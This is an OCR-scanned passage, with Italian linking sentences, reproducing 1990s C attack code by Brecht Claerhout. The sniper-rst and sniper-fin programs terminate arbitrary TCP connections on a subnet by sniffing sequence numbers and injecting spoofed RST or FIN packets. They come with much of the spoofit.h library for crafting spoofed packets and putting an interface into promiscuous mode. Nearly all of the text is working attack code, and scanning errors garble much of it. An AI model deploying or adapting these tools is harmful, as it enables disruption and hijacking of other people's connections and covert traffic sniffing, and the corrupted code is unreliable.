*/ 
*/ 
*/ 



Author - Brecht Claerhout <Coder@reptile . mg . ac .be> 

Serious advice, comments, statements, greets, always welcome */ 
flames, moronic 3133t >/dev/null */ 

*/ 

Disclaimer - This program is for educational purposes only. I am in */ 
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/* NO way responsible for what you do with this program, */ 

/* or any damage you or this program causes . */ 

/* */ 

/* For whom - People with a little knowledge of TCP/IP, C source code */ 

/* and general UNIX. Otherwise , please keep your hands of, */ 

/* and catch up on those things first. */ 

/* */ 

/* Limited to - Linux 1.3.X or higher . */ 

/* ETHERNET support ("ethO" device) */ 

/* If you network configuration differs it shouldn 't be to */ 

/* hard to modify yourself . I got it working on PPP too, */ 

/* but I 'm not including extra configuration possibilities */ 

/* because this would overload this first release that is */ 

/* only a demonstration of the mechanism. */ 

/* Anyway if you only have ONE network device (slip, */ 

/* PPP, • • - ) after a quick look at this code and spoofit.h */ 

/* it will only take you a few secs to fix it . . . */ 

/* People with a bit of C knowledge and well known with */ 
/* their OS shouldn 't have to much trouble to port the code.*/ 

/* If you do, I would love to get the results. */ 

/* * ~ V 

/* Compiling - gcc -o sniper-rst sniper-rst . c */ 

/* " V 

/* Usage - Usage described in the spoofing article that carne with this. */ 

/* If you didn't get this, try to get the full release. . . */ 

/* ' */ 

/* See also - Sniffit (for getting the necessairy data on a connection) */ 



/****************************** 
^include "spoofit.h" 

/* Those 2 'defines ' are important for putting the receiving device in */ 
/* PROMISCUOUS mode */ 
tidefine INTERFACE "ethO" 
tidefine INTERFACE_PREFIX 14 

char SOURCE [100] ,DEST [100] ; 
int SOURCE_P , DEST_P ; 

void main(int argc, char *argv[]) 
{ 

int i,stat,j; 
int fd_send, fd_receive; 
unsigned long sp_ack, sp_seq; 
unsigned short flags; 
struct sp_wait_packet pinfo; 

if (argc != 5) 
{ 

printf ("usage: %s hostl porti host2 port2\n" , argv[0] ) ; 

exit (0) ; 

ì 

/* preparing some work */ 
DEV_PREFIX = INTERE ACE_PREF IX; 
strcpy (SOURCE, argv[ 1] ) ; 
SOURCE_P=atoi (argv[2] ) ; 
strcpy (DEST, argv[ 3] ) ; 
DEST_P=atoi (argv[ 4] ) ; 

/* opening sending and receiving sockets */ 
fd_send = open_sending() ; 

fd_receive = open_receiving (INTERFACE, IO_NONBLOCK) ; /* nonblocking IO */ 
printf ("Trying to terminate the connection\n") ; 
for (i=l;i<=l 00;i++) 
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/* Waitlng for a packet containing an ACK */ 

stat=wa±t _packet (fd_rece±ve, Spinfo, SOURCE, SOURCE_P, DEST, DEST_P, ACK, 5) ; 
lf(stat==-l) {printf ("Connection 5 secs idle or dead. .. \n "); exit (1) ; } 
sp_seq=pinfo . ack; 
sp_ack=0 ; 
j=0; 

/* Sending our fake Packet */ 

/* for (j=0; j<10; This would be better */ 
/* { */ 

transmit_TCP (fd_send, NULL, 0, 0, 0, DEST, DEST_P, SOURCE, SOURCE_P, 

sp_seq+j, sp_ack, RST) ; 
/* } */ 

/* waiting for confirmation */ 

stat=wait _packet (fd_receive, Spinfo, SOURCE, SOURCE_P, DEST, DEST_P, 0, 5) ; 
if(stat<0) 
{ 

printf ("Connection 5 secs idle or dead. . . \n") ; 

exit (0) ; 

} 

} 

printf ("I did not succeed in killing it.\n"); 



La stessa cosa potrebbe essere eseguita impostando il flag FIN. 
L'implementazione in C è la seguente: 



/************************************ 


/* 


Sniper-fin - Example program on connection killing with IP spoofing 


*/ 


/* 


using the FIN flag. 


*/ 


/* 


(illustration for 'A short overview of IP spoofing') 


*/ 


/* 




*/ 


/* 


Purpose - Killing any TCP connection on your subnet 


*/ 


/* 




*/ 


/* 


Author - Brecht Claerhout <Coder@reptile . rug . ac .be> 


*/ 


/* 


Serious advice, comments, statements, greets, always welcome 


*/ 


/* 


flames, moronic 3133t >/dev/null 


*/ 


/* 




*/ 


/* 


Disclaimer - This program is for educational purposes only. I am in 


*/ 


/* 


NO way responsible for what you do with this program, 


*/ 


/* 


or any damage you or this program causes . 


*/ 


/* 




*/ 


/* 


For whom - People with a little knowledge of TCP/IP, C source code 


*/ 


/* 


and general UNIX. Otherwise, please keep your hands of, 


*/ 


/* 


and catch up on those things first. 


*/ 


/* 




*/ 


/* 


Limited to - Linux 1.3.X or higher. 


*/ 


/* 


ETHERNET support ("ethO" device) 


*/ 


/* 


If you network configuration differs it shouldn 't be to 


*/ 


/* 


hard to modify yourself . I got it working on PPP too, 


*/ 


/* 


but I 'm not including extra configuration possibilities 


*/ 


/* 


because this would overload this first release that is 


*/ 


/* 


only a demonstration of the mechanism. 


*/ 


/* 


Anyway if you only have ONE network device (slip, 


*/ 


/* 


ppp, ... ) after a quick look at this code and spoofit.h 


*/ 


/* 


it will only take you a few secs to fix it . . . 


*/ 


/* 


People with a bit of C knowledge and well known with 


*/ 


/* 


their OS shouldn 't have to much trouble to port the code. 


*/ 


/* 


If you do, I would love to get the results. 


*/ 


/* 




*/ 


/* 


Compiling - gcc -o sniper-fin sniper-fin . c 


*/ 


/* 




*/ 


/* 


Usage - Usage described in the spoofing article that carne with this. 


*/ 


/* 


If you didn't get this, try to get the full release. . . 


*/ 


/* 




*/ 
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/******************************************** 

^include "spoofit .h" 

/* Those 2 ' defines ' are important for putting the receiving device in */ 
/* PROMISCUOUS mode */ 
tidefine INTERFACE "ethO" 
tidefine INTERFACE_PREFIX 14 

char SOURCE [100] , DEST [100] ; 
int SOURCE_P , DEST_P ; 

void main(int argc, char *argv[]) 
{ 

int i,stat; 

int fd_send, fd_receive; 
unsigned long sp_ack, sp_seq; 
unsigned short flags; 
struct sp_wait_packet pinfo; 

if (argc != 5) 
{ 

printf ( "usage : %s hostl porti host2 port2\n" , argv[0] ) ; 

exit(O); 

ì 

/* preparing some work */ 
DEV_PREFIX = INTERFACE_PREFIX; 
strcpy (SOURCE, argv[ 1 ] ) ; 
SOURCE_P=atoi (argv[2] ) ; 
strcpy (DEST, argv[ 3] ) ; 
DEST_P=atoi (argv[ 4] ) ; 

/* opening sending and receiving sockets */ 
fd_send = open_sending ( ) ; 

fd_receive = open_receiving (INTERFACE, IO_NONBLOCK) ; /* nonblocking IO */ 

for (i=l; i<100; i++) 
{ 

printf ( "Attack Sequence %d.\n",i); 

/* Waiting for a packet containing an ACK */ 

stat=wait_packet (fd_receive, Spinfo, SOURCE, SOURCE_P, DEST, DEST_P, ACK, 10) ; 

if(stat==-l) {printf ( "Connection 10 secs idle... timeout . \n" ) ; exit (1) ; } 

sp_seq=pinfo . ack; 

sp_ack=pinfo . seq+pinfo . datalen; 

/* Sending our fake Packet */ 

transmit_TCP (fd_send, 
NULL, 0, 0, 0, DEST, DEST_P, SOURCE, SOURCE_P, sp_seq, sp_ack, ACK /FIN) ; 
/* waiting for confirmation */ 

stat=wait _packet (fd_receive, Spinfo, SOURCE, SOURCE_P, DEST, DEST_P, FIN, 5) ; 
if (stat>=0) 
{ 

printf ( "Killed the connection ... \n" ) ; 

exit (0) ; 

} 

printf ("Hmmmm. . . . no response detected. . . (retry) \n") ; 
} 

printf ("I did not succeed in killing it.\n"); 
} 

Il seguente sorgente permette di implementare facilmente delle funzioni di spoofing all'interno 
dei vostri programmi. 

Il tutto deve essere compilato sotto Linux con Kernel superiore alla versione 1 .3.x 



/************************************ 
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/* 


Spooflt . h - Include file for easy creatlng of spoofed TCP packets 


*/ 


/* 


Requlres LINUX 1.3.X (or later) Kernel 


*/ 


/* 


(illustration for 'A short overvlew of IP spooflng') 


*/ 


/* 


V. 1 - Copyright 1996 - Brecht Claerhout 


*/ 


/* 




*/ 


/* 


Purpose - Provldlng skllled people wlth a easy to use spooflng source 


*/ 


/* 


I used It to be able to wrlte my tools fast and short. 


*/ 


/* 


Mlnd you thls is only illustrative and can be easlly 


*/ 


/* 


optlmlsed. 


*/ 


/* 




*/ 


/* 


Author - Brecht Claerhout <Coder@reptlle . rug . ac .be> 


*/ 


/* 


Serious advice, comments, statements, greets, always welcome 


*/ 


/* 


flames, moronic 3133t >/dev/null 


*/ 


/* 




*/ 


/* 


Disclaimer - Thls file is for educational purposes only. I am in 


*/ 


/* 


NO way responsible for what you do wlth this file, 


*/ 


/* 


or any damage you or this file causes . 


*/ 


/* 




*/ 


/* 


For whom - People wlth a little knowledge of TCP/IP, C source code 


*/ 


/* 


and general UNIX. Otherwise, please keep your hands of, 


*/ 


/* 


and catch up on those things first . 


*/ 


/* 




*/ 


/* 


Limited to - Linux 1.3.X or higher . 


*/ 


/* 


If you know a little about your OS, shouldn't be to hard 


*/ 


/* 


to port . 


*/ 


/* 




*/ 


/* 


Important note - You might have noticed I use non standard packet 


*/ 


/* 


header struct 's. How come?? Because I started like 


*/ 


/* 


that on Sniffit because I wanted to do the 


*/ 


/* 


bittransforms myself . 


*/ 


/* 


fieli I got so damned used to them, I keep using them, 


*/ 


/* 


they are not very different, and not hard to use, so 


*/ 


/* 


you' 11 easlly use my struct ' s without any problem, 


*/ 


/* 


this code and the examples show how to use them. 


*/ 


/* 


my apologies for this inconvenience . 


*/ 


/* 




*/ 


/* 


None of this code can be used in commercial software. You are free to 


*/ 


/* 


use it in any other non-commercial software (modified or not) as long 


*/ 


/* 


as you give me the credits for it . You can spread this include file, 


*/ 


/* 


but keep it unmodified. 


*/ 


/* 




*/ 


/****************************** 


/* 




*/ 


/* 


Easiest way to understand this library is to look at the use of it, in 


*/ 


/* 


the example progs . 


*/ 


/* 




*/ 


/**** sending packets *****************************************************/ 


/* 




*/ 


/* 


int open_sending (void) 


*/ 


/* 


Returns a filedescriptor to the sending socket . 


*/ 


/* 


dose it with dose (int filedesc) 


*/ 


/* 




*/ 


/* 


void transmit_TCP (int sp_fd, char *sp_data, 


*/ 


/* 


int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, * 


/ 


/* 


char *sp_source, unsigned short sp_source __port, 


*/ 


/* 


char *sp_dest, unsigned short sp_dest_port , 


*/ 


/* 


unsigned long sp_seq, unsigned long sp_ack, 


*/ 


/* 


unsigned short sp_flags) 


*/ 


/* 


fire data away in a TCP packet 


*/ 


/* 


sp_fd : raw socket filedesc. 


*/ 


/* 


sp_data : IP options (you should do the padding) 


*/ 


/* 


TCP options (you should do the padding) 


*/ 


/* 


data to be transmitted 


*/ 


/* 


(NULL is nothing) 


*/ 


/* 


note that ali is optional, and IP en TCP options are*/ 


/* 


not often used. 


*/ 


/* 


Ali data is put after eachother in one buffer. 


*/ 
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/* sp_tcpoptlen : length of TCP optlons (in bytes) */ 

/* sp_datalen : amount of data to be transmitted (bytes) */ 

/* sp_source : spoofed host that "sends packet " */ 

/* sp_source _port : spoofed port that "sends packet " */ 

/* sp_dest : host that should receive packet */ 

/* sp_dest __port : port that should receive packet */ 

/* sp_seq : sequence number of packet */ 

/* sp_ack : ACK of packet */ 

/* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) */ 

/* */ 

/* void transmit_UDP (int sp_fd, char *sp_data, */ 

/* int sp_ipoptlen, int sp_datalen, */ 

/* char *sp_source, unsigned short sp_source _port, */ 

/* char *sp_dest, unsigned short sp_dest _port) */ 

/* fire data away in an UDP packet */ 

/* sp_fd : raw socket filedesc. */ 

/* sp_data : IP options */ 

/* data to be transmitted */ 

/* (NULL if none) */ 

/* sp_ipoptlen : length of IP options (in bytes) */ 

/* sp_datalen : amount of data to be transmitted */ 

/* sp_source : spoofed host that "sends packet " */ 

/* sp_source __port : spoofed port that "sends packet " */ 

/* sp_dest : host that should receive packet */ 

/* sp_dest __port : port that should receive packet */ 

/* ~ V 
/**** Receiving packets ***************************************************/ 

/* */ 

/* int open_receiving (char *rc_device, char mode) */ 

/* Returns fdesc to a receiving socket */ 

/* (if mode: IO_HANDLE don't cali this twice, global var */ 

/* rc_fd_abcl23 is initialised) */ 

/* rc_device: the device to use e.g. "ethO", "pppO" */ 

/* be sure to change DEV_PREFIX accordingly! */ 

/* DEV_PREFIX is the length in bytes of the header that */ 

/* comes with a SOCKET_PACKET due to the network device */ 

/* mode: 0: normal mode, blocking, (read will wait till packet */ 

/* comes, mind you, we are in PROMISC mode) */ 

/* IO_NONBLOCK : non-blocking mode (read will not wait till */ 

/* usefull for active polling) */ 

/* IO_HANDLE installs the signal handler that updates SEQ,ACK, . .*/ 

/* (IO_HANDLE is not recommended to use, as it should be */ 

/* modified according to own use, and it works bad on heavy */ 

/* traffic continuous monitoring. I needed it once, but left it */ 

/* in to make you able to have a look at Signal handled IO, */ 

/* personally I would have removed it, but some thought it */ 

/* doesn ' t do any harm anyway, so why remove . . . ) */ 

/* (I'm not giving any more info on IO_HANDLE as it is not */ 

/* needed for the example programs, and interested people can */ 

/* easilythey figure the code out theirselves . ) */ 

/* (Besides IO_HANDLE can only be called ONCE in a program, */ 

/* other modes multiple times) */ 

/* * V 

/* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, */ 

/* unsigned char *proto) */ 

/* This waits for a packet (mode default) and puts it in buffer or */ 

/* returns whether there is a pack or not (IO_NONBLOCK) . */ 

/* It returns the packet length if there is one available, else 0 */ 

/* */ 

/* int wait __packet (int wp_fd, struct sp_wait _packet *ret_values, */ 

/* char *wp_source, unsigned short wp_source _port, */ 

/* char *wp_dest, unsigned short wp_dest _port, */ 

/* int wp_flags, int wait_time) ; */ 

/* wp_fd: a receiving socket (de fault or IO_NONBLOCK) */ 

/* ret_values: pointer to a sp_wait _packet struct, that contains SEQ, */ 

/* ACK, flags, datalen of that packet . For further packet */ 

/* handling see the examples . */ 

/* struct sp_wait_packet { */ 
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/* unslgned long seq, ack; 
*/ 

/* unslgned short flags; */ 

/* int datalen; */ 

/* }; */ 

/* wp_source, wp_source __port : sender of packet */ 

/* wp_dest, wp_dest _port : recelver of packet */ 
/* wp_flags: flags that should be present In packet.. (mlnd you there */ 

/* could be more present, so check on return) */ 

/* note: if you don't care about flag, use 0 */ 
/* wait_tlme: if not zero, this functlon will return -1 if no correct */ 

/* packet has arrived within wait_time secs. */ 

/* (only works on IO_NONBLOCK socket) */ 

/* " */ 

/* void set_filter (char *f_source, unslgned short f_source _port, */ 

/* char *f_dest, unslgned short f_dest _port) */ 

/* (for use with IO_HANDLE) */ 

/* Start the program to watch ali trafic from source/port to */ 

/* dest/port . This enables the updating of global data. Can */ 

/* be called multiple times. */ 

/* ' */ 

/* void close_receiving (void) */ 

/* When opened a IO_HANDLE mode receiving socket dose it with */ 

/* this. */ 

/* */ 
/**** Global DATA (IO HANDLE mode) ****************************************/ 

/* */ 
/* When accessing global data, copy the values to locai vars and then use */ 

/* them. Reduce access time to a minimum. */ 

/* Mlnd you use of this is very limited, if you are a novice on IO, just */ 

/* ignore it, the other functions are good enough!) . If not, rewrite the */ 

/* handler for your own use. . . */ 

/* " */ 

/* sig_atomic_t SP_DATA_BUSY */ 

/* Put this on NON-ZERO when accesing global data . Incoming */ 

/* packets will be ignored then, data can not be overwritten. */ 

/* */ 

/* unslgned long int CUR_SEQ, CUR_ACK; */ 

/* Last recorded SEQ and ACK number of the filtered "stream" . */ 

/* Before accessing this data set SP_DATA_BUSY non-zero, */ 

/* afterward set it back to zero. */ 

/* */ 

/* unslgned long int CUR_COUNT; */ 

/* increased everytime other data is updated */ 

/* " */ 

/* unslgned int CUR_DA TALEN; */ 

/* Length of date in last TCP packet */ 

/* */ 
/*********************************** 



^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 



"sys/ socket . h " 

"netdb.h" 

"stdlib.h" 

"unistd.h" 

"stdio.h" 

"errno.h" 

"netinet/in.h" 

"netinet/ip.h" 

" linux/ if .h" 

"sys/ioctl . h " 

"sys/types . h " 

"signal . h " 

"fcntl.h" 



/* includes, what would we do without them */ 



tiundef DEBUG 
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ttdefine IP_HEAD_BASE 
*/ 

ttdefine TCP_HEAD_BASE 
*/ 

#deflne UDP_HEAD_BASE 
*/ 

ttdefine IO_HANDLE 1 

ttdefine IO_NONBLOCK 2 

int DEV_PREFIX = 9999; 

sig_atomic_t WAI T_PACKET_ WAI T_ TIME=0 ; 
/**** 

************************************************************/ 
int rc_fd_abcl23; 
sig_atomic_t RC_FILTSET=0 ; 

char rc_filter_string [50] ; /* x.x.x.x.p 

sig_atomic_t SP_DATA_BUSY=0 ; 

unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0 ; 
unsigned int CUR_DATALEN; 

unsigned short CUR_FLAGS ; 
/******************************************* 

/ 



20 /* using fixed lengths to send 

20 /* no options etc. . . 

8 /* Always fixed 



IO_HANDLE 



-y-y-y-y-g */ 



struct sp_wait_packet 
{ 

unsigned long seq, ack; 
unsigned short flags; 
int datalen; 



/* Code from Sniffit - BTW my own program. . . . no copyright violation here */ 

idefine URG 32 /* TCP flags */ 

Itdefine ACK 16 

tidefine PSH 8 

#define RST 4 

itdefine SYN 2 

itdefine FIN 1 



struct PACKET_info 
{ 

int len, datalen; 

unsigned long int seq_nr, ACK_nr; 
u_char FLAGS; 

}; 



struct IP_header /* The IPheader (without options) */ 

{ 

unsigned char verlen, type; 

unsigned short length, ID, flag_offset; 

unsigned char TTL, protocol; 

unsigned short checksum; 

unsigned long int source, destination; 



struct TCP_header /* The TCP header (without options) */ 

{ 

unsigned short source, destination; 
unsigned long int seq_nr, ACK_nr; 

unsigned short offset_flag, window, checksum, urgent; 



struct UDP_header /* The UDP header */ 

{ 

unsigned short source, destination; 
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}; 

struct pseudo_IP_header /* The pseudo IP header (checksum cale) */ 

{ 

unsigned long int source, destination; 
char zero_byte, protocol; 
unsigned short TCP_UDP_len; 

}; 

/* data structure for argument passing */ 

struct sp_data_exchange { 

int fd; /* Shlt from transmlt_TCP */ 

char *data; 
int datalen; 

char *source; unsigned short source_port; 
char *dest; unsigned short dest_port; 

unsigned long seq, ack; 

unsigned short flags; 

char *buffer; /* work buffer */ 

int IP_optlen; /* IP options length in bytes */ 

int TCP_optlen; /* TCP options length in bytes */ 

}; 

/**************** ali functions 

*******************************************/ 

void transmit_TCP (int fd, char *sp_data, 

int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, 

char *sp_source, unsigned short sp_source_port , 
char *sp_dest, unsigned short sp_dest _port, 

unsigned long sp_seq, unsigned long sp_ack, 
unsigned short sp_flags) ; 

void transmit_UDP (int sp_fd, char *sp_data, 

int ipoptlen, int sp_datalen, 

char *sp_source, unsigned short sp_source_port , 
char *sp_dest, unsigned short sp_dest _port) ; 

int get _packet (int rc_fd, char *buffer, int *, unsigned char*) ; 

int wait __packet (int, struct sp_wait_packet *,char *, unsigned short, char *, 

unsigned short, int, int); 

static unsigned long sp_getaddrbyname (char *) ; 

int open_sending (void) ; 

int open_receiving (char *, char); 

void close_receiving (void) ; 

void sp_send_packet (struct sp_data_exchange *, unsigned char); 

void sp_fix_TCP _packet (struct sp_data_exchange *) ; 

void sp_fix_UDP _packet (struct sp_data_exchange *) ; 

void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char); 

unsigned short in_cksum (unsigned short *, int ); 

void rc_sigio (int) ; 

void set_filter (char *, unsigned short, char *, unsigned short); 
/********************* 2et the games commence ****************************/ 

static unsigned long sp_getaddrbyname (char *sp_name) 
{ 

struct hostent *sp_he; 
int i; 

if (isdigit (*sp_name) ) 
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for (1=0; K100; 
{ 

if ( ! (sp_he = gethostbyname (sp_name) ) ) 

{pr±ntf( "WARNING: gethostbyname f allure ! \n ") ; 
sleep(l) ; 

if (i>=3) /* always a retry here In this kind of application */ 

printf ( "Coudn ' t resolv hostname . " ) , exit(l); 

} 

else break; 
} 

return sp_he ? * (long*) *sp_he->h_addr_list : 0; 
} 

int open_sending (void) 
{ 

struct protoent *sp__proto; 
int sp_fd; 
int dummy=l; 

/* they don ' t come rawer */ 

if ( (sp_fd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) ==-1 ) 
perror ("Couldn't open Socket."), exit (1) ; 

tiifdef DEBUG 

printf ( "Raw socket ready\n ") ; 

tiendif 

return sp_ fd; 
} 

void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto) 
{ 

int sp_status; 

struct sockaddr_in sp_server; 
struct hostent *sp_help; 
int HEAD_BASE; 

/* Construction of destination */ 

bzero((char *) &sp_server, sizeof (struct sockaddr) ) ; 
sp_server . sin_family = AF_INET; 

sp_server . sin_addr . s_addr = inet_addr (sp->dest) ; 
if (sp_server. sin_addr. s_addr == (unsigned int) -1) 

{ /* if target not in DOT/number notation */ 

if ( ! (sp_help=gethostbyname (sp->dest) ) ) 

f printf (stderr, "unknown host %s\n" , sp->dest) , exit (1) ; 

bcopy (sp_help->h_addr, (caddr_t) &sp_server . sin_addr, sp_help- 

>h_length) ; 

}; 

switch (proto) 
{ 

case 6: HEAD_BASE = TCP_HEAD_BASE ; break; /* TCP */ 

case 17: HEAD_BASE = UDP_HEAD_BASE ; break; /* UDP */ 

de fault: exit (1) ; break; 

}; 

sp_status = sendto (sp->fd, (char *) (sp->buffer) , sp- 

>da talen +HEAD_BASE+IP_HEAD_BASE+sp-> IP_ opti en , 0, 

(struct sockaddr *) &sp_server, sizeof (struct sockaddr)); 
if (sp_status < 0 II sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp- 
>IP_optlen) 
{ 

if (sp_status < 0) 

perror ( "Sendto") , exit (1) ; 
printf ("hmm. . . Only transmitted %d of %d bytes.\n", sp_status, 

sp—>datalen+HEAD_BASE) ; 

}; 

ftifdef DEBUG 

printf ("Packet transmitted. . . \n") ; 
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#endif 

} 

vold sp_flx_IP_packet (struct sp_data_exchange *sp, unslgned char proto) 
{ 

struct IP_header *sp_help_lp; 
Int HEAD_BASE; 

swltch (proto) 
{ 

case 6: HEAD_BASE = TCP_HEAD_BASE ; break; 
case 17: HEAD_BASE = UDP_HEAD_BASE ; break; 
de fault: exit (1) ; break; 

}; 

sp_help_lp = (struct IP_header *) (sp->buffer) ; 
sp_help_lp->verlen = (IP_VERSION « 4) \ ( (IP_HEAD_BASE+sp->IP_optlen) /4) ; 
sp_help_lp->type = 0; 

sp_help_lp->length = htons (IP_HEAD_BASE+HEAD_BASE+sp—>datalen+sp— 

>IP_optlen+sp->TCP_optlen) ; 

sp_help_ip->ID = htons (12545) ; /* TEST */ 

sp_help_lp->flag_offset = 0; 
sp_help_lp->TTL = 69; 
sp_help_lp->protocol = proto; 

sp_help_lp->source = sp_getaddrbyname (sp->source) ; 
sp_help_lp->destlnatlon = sp_getaddrbyname (sp->dest) ; 
sp_help_ip->checksum=in_cksum( (unslgned short *) (sp->buffer) , 

IP_HEAD_BASE+sp->IP_optlen) ; 

tilfdef DEBUG 

prlntf ("IP header flxed. . . \n") ; 

iendif 
} 

vold sp_flx_TCP __packet (struct sp_data_exchange *sp) 
{ 

char sp _pseudo_lp_construct [MTU] ; 
struct TCP_header *sp_help_tcp; 
struct pseudo_IP_header *sp_help_pseudo; 
Int i; 

for (1=0; KMTU; 1++) 

{ sp _pseudo_lp_construct [1 ] =0; } 

sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen); 
sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_lp_construct; 

sp_help_tcp->offset_flag = htons ( ( ( (TCP_HEAD_BASE+sp->TCP_optlen) /4) «12) / 
sp->flags) ; 

sp_help_tcp->seq_nr = htonl (sp->seq) ; 
sp_help_tcp->ACK_nr = htonl (sp->ack) ; 
sp_help_tcp->source = htons (sp->source_port) ; 
sp_help_tcp->destlnatlon = htons (sp->dest _port) ; 

sp_help_tcp->wlndow = htons (Oxl cOQ) ; /* dummy for now 'wujx' */ 

sp_help__pseudo->source = sp_getaddrbyname (sp->source) ; 
sp_help_pseudo->destlnatlon = sp_getaddrbyname (sp->dest) ; 
sp_help _pseudo->zero_byte = 0; 
sp_help __pseudo->protocol = 6; 

sp_help__pseudo->TCP_UDP_len = htons ( sp->datalen+TCP_HEAD_BASE+sp- 

>TCP_optlen) ; 

memcpy (sp __pseudo_lp_construct+12 , sp_help_tcp , sp->TCP_optlen+sp- 

>da talen+ TCP_HEAD_BASE ) ; 

sp_help_tcp->checksum=ln_cksum( (unslgned short *) sp_pseudo_lp_construct , 

sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen) ; 

tiifdef DEBUG 

prlntf ("TCP header flxed. . . \n") ; 

iendif 



/* TCP */ 
/* UDP */ 
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void transm±t_TCP (int sp_fd, char *sp_data, 

int sp_±poptlen, int sp_tcpoptlen, int sp_datalen, 

char *sp_source, unsigned short sp_source_port , 
char *sp_dest, unsigned short sp_dest _port, 

unsigned long sp_seq, unsigned long sp_ack, 
unsigned short sp_flags) 

{ 

char sp_buffer[1500]; 

struct sp_data_exchange sp_struct; 



bzero (sp_buffer, 1500) ; 
if (sp_ipoptlen!=0) 

memcpy (sp_buffer+IP_HERD_BASE, sp_data, sp_ipoptlen) ; 



if (sp_tcpoptlen!=0) 

memcpy ( sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ ipopt len, 

sp_data+sp_ipoptlen , sp_tcpoptlen) ; 

if (sp_datalen!=0) 

memcpy (sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ ipopt 1 en +sp_ t cpoptlen , 
sp_data+sp_ipoptlen+sp_tcpoptlen, sp_datalen) ; 



sp_struct . fd 
sp_struct . data 
sp_struct . datalen 
sp_struct . source 
sp_struct . source_port 
sp_struct . dest 
sp_struct . dest_port 
sp_struct . seq 
sp_struct . ack 
sp_struct . flags 
sp_struct .buffer 
sp_struct . IP_optlen 
sp_struct . TCP_optlen 



= sp_fd; 

= sp_data; 

= sp_datalen; 

= sp_source; 

= sp_source _port; 

= sp_dest; 

= sp_dest _port; 

= sp_seq; 

= sp_ack; 

= sp_flags; 

= sp_buffer; 

= sp_ipoptlen; 

= sp_tcpoptlen; 



sp_fix_TCP_packet (&sp_struct) ; 
sp_fix_IP _packet (&sp_struct, 6); 
sp_send _packet (&sp_struct, 6); 
} 



void sp_fix_UDP __packet (struct sp_data_exchange *sp) 
{ 

char sp _pseudo_ip_construct [MTU] ; 
struct UDP_header *sp_help_udp; 
struct pseudo_IP_header *sp_help_pseudo; 
int i; 



for (i=0;i<MTU; i++) 

{ sp _pseudo_ip_construct [i ] =0; } 



sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen); 
sp_help__pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct ; 



sp_help_udp->source = htons (sp->source_port) ; 
sp_help_udp->destination = htons (sp->dest _port) ; 
sp_help_udp->length = htons (sp->datalen+UDP_HEAD_BASE) ; 



sp_help__pseudo->source = sp_getaddrbyname (sp->source) ; 
sp_help_pseudo->destination = sp_getaddrbyname (sp->dest) ; 
sp_help __pseudo->zero_byte = 0; 
sp help pseudo->protocol = 1 7; 

sp_help_pseudo->TCP_UDP_len = htons (sp->datalen+UDP_HEAD_BASE) ; 



memcpy (sp__pseudo_ip_construct+12 , sp_help_udp, sp->datalen+UDP_HEAD_BASE) ; 
sp_help_udp->checksum=in_cksum( (unsigned short *) sp_pseudo_ip_construct , 

sp->datalen+12+UDP_HEAD_BASE) ; 
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tiifdef DEBUG 

printf ("UDP header fixed. . . \n") ; 

tendi f 
} 



void transmit_UDP (int sp_fd, char *sp_data, 

int sp_ipoptlen, int sp_datalen, 

char *sp_source, unsigned short sp_source_port , 
char *sp_dest, unsigned short sp_dest _port) 

{ 

char sp_buffer[1500] ; 

struct sp_data_exchange sp_struct; 



bzero (sp_buffer, 1500) ; 



if (sp_ipoptlen!=0) 

memcpy (sp_buffer+IP_HEAD_BASE, sp_data, sp_ipoptlen) ; 
if (sp_data!=NULL) 

memcpy (sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen, 

sp_data+sp_ipoptlen, sp_datalen) ; 

sp_struct . fd = sp_fd; 

sp_struct . data = sp_data; 

sp_struct . datalen = sp_datalen; 

sp_struct . source = sp_source; 

sp_struct . source_port = sp_source _port; 
sp_struct . dest = sp_dest; 

sp_struct . dest_port = sp_dest _port; 
sp_struct .buffer = sp_buffer; 

sp_struct . IP_optlen = sp_ipoptlen; 
sp_struct . TCP_optlen = 0; 

sp_fix_UDP_packet (&sp_struct) ; 
sp_fix_IP _packet (&sp_struct, 17); 
sp_send _packet (&sp_struct, 17); 
} 

/* This routine stolen from ping.c — HAHAHA! */ 
unsigned short in_cksum (unsigned short *addr, int len) 
{ 

register int nleft = len; 
register unsigned short *w = addr; 
register int sum = 0; 
unsigned short answer = 0; 

while (nleft > 1) 
{ 

sum += *w++; 
nleft -= 2; 
} 

if (nleft == 1) 
{ 

* (u_char *) (Sanswer) = * (u_char *)w ; 

sum += answer; 

} 

sum = (sum » 16) + (sum & Oxffff); 

sum += (sum » 16); 

answer = ~sum; 

return (answer) ; 

} 

^ "tt * it ic )fr it it ic it it it ic )fr it it * )fr it ~k ic )fr * it ic "k Receiving department 

*k*k*k*k*k*k*k*k*k*k*k*k*k*k/ 



int open_receiving (char *rc_device, char mode) 
{ 

int or_fd; 

struct sigaction rc_sa; 
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struct ifreq ifinfo; 
char test; 



/* create snoop socket and set interface promise */ 

if ( (or_fd = socket (AF_INET, SOCK_PACKET, htons (0x3) ) ) ==-1) 

perror ("Couldn't open Socket."), exit (1) ; 
strepy (ifinfo . ifr_ifrn . ifrn_name, rc_device) ; 
iffioctl (or_fd, SIOCGIFFLAGS , iifinfo) <0) 

perror ("Couldn't get flags."), exit(l); 
i f in fo.ifr_ifru.ifru_ flags /= IFF_PROMISC ; 
iffioctl (or_fd, SIOCSIFFLAGS, Si f info) <0) 

perror ("Couldn't set flags. (PROMISC)"), exit (1) ; 



if (mode fi IO_HANDLE) 

{ /* instali handler 

rc_sa . sa_handler=rc_sigio ; 

sigemptyset (&rc_sa . sa_mask) ; 

rc_sa . sa_flags=0 ; 

